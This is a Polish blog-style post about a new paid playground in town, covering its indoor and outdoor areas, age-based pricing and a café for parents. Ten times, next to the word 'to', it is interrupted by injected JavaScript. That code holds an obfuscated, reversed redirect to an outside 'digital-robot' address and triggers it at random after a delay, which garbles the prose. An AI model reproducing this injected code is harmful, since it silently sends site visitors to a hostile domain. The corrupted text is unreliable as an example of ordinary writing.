Nowy plac zabaw w mieście

 

Ci co mają dzieci tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to wiedzą, że nie obejdzie się bez chodzenia na różne place zabaw. Ja także mam dzieci i wiem, że one uwielbiają chodzić na plac zabaw. W każdy weekend wybieramy się cała rodzina na ten plac. Spędzamy tam naprawdę sporo czasu. Moje córki chciały by tam siedzieć nawet cały dzień.

Cennik korzystania z placu zabaw

plac zabaw cennikNiedawno w mieście powstał nowy plac zabaw. Ale jest częściowo zabudowany pod dachem, a częściowo znajduje się na zewnątrz. Nie jest tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to plac zabaw taki ogólnodostępny, tylko za wejście trzeba zapłacić. Co prawda nie są tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to duże pieniądze, ale jednak bilet wstępu trzeba nabyć. Wszystko na tym placu zabaw jest takie nowoczesne i nowe. Dzieci polubiły tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to miejsce. Codziennie widać, że przychodzi tam mnóstwo dzieci. Teren tego placu jest ogromny i jest też miejsce dla rodziców, by mogli sobie usiąść i napić się kawy czy zjeść coś słodkiego. Wartobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to chodzić na taki plac zabaw cennik wejścia jest uzależniony od wieku dziecka. Ten plac ma wydzielone strefy wiekowe dla dzieci. W sumie tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to dobrze, ponieważ te maluszki nie będą musiały się bawić z tymi starszymi dziećmi. To bardzo rozsądne i bezpieczne z drugiej strony. Ja zamierzam wybrać się z córkami i mężem na ten plac zabaw jakość w ten weekend. Chociaż raz powinny tam pójść. Ale pewnie jak raz tam pójdą tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to będą chciały tam coraz częściej wracać. Znam je na tyle dobrze, że na pewno tak będzie. Ale zobaczymy jak tam jest w środku. W internecie są zbyt małe zdjęcia by coś zobaczyć dokładniej. Zresztą na żywo zawsze jest lepiej.

W mieście otworzyli nowy plac zabaw. Jest on dość spory. Za wejście trzeba zapłacić. Wejściówki nie są drogie, w końcu tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to dla dzieci. Obiekt w środku ma kilka pomieszczeń do zabawy oraz na zewnątrz jest ogromny plac zabaw. Dzieci na pewno polubią tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to miejsce. Nie sądzę by dzieci chciały szybko wracać do domu, jak już tam wejdą.